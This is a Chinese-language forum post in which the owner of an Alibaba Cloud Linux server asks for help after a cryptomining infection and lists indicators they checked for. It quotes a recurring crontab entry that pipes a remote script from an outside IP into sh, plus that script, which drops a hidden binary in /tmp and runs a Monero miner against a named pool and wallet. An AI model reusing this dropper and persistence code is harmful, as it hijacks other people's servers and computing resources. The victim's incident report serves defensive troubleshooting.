请教大神，服务器被挖矿程序入侵如何排插

我用的阿里云的服务器，linux系统，有时CPU占用100%，这个时候根本连接不上服务器，只能通过强制重启的方式后才能使用，所以很难看到哪个进程占了资源，但至少我自己并没长时间跑什么程序。同时，非root用户下经常在crontab里发现类似如下的任务，删了又有
*/1 * * * * curl 107.179.126.28/_x2|sh
登陆这个网址有如下代码段
AGENT_FILE='/tmp/.X11_86'
if [ ! -f $AGENT_FILE ]; then
curl 107.179.126.28/_x3 > $AGENT_FILE
fi
if [ ! -x $AGENT_FILE ]; then
chmod +x $AGENT_FILE
fi
ps -ef|grep $AGENT_FILE|grep -v grep
if [ $? -ne 0 ]; then
nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB -p x > /dev/null 2>&1 &
fi


问过阿里的客服，说是被入侵了，但并没有告诉如何排插
我自己搜索了下，和有的被挖矿程序入侵的比较类似但是有不同，不同点如下
1、/usr/local/etc 里面没有东西
2、没有yam文件
3、没有/root/.ssh/KHK75NEOiq
4、/opt/minerd 和 /opt/KHK75NEOiq33 也没有
5、没有lady服务

所以挺奇怪这个crontab里的数据哪里来的，看crontrab日志也看不出个名堂，我现在唯一的办法是把crontab任务停了，但是这影响我的使用了，所以还望大家指教。
下面是另外个哥们儿的排查方法，我和他唯一相同的就是crontab里有数据
http://m.blog.csdn.net/article/details?id=51971121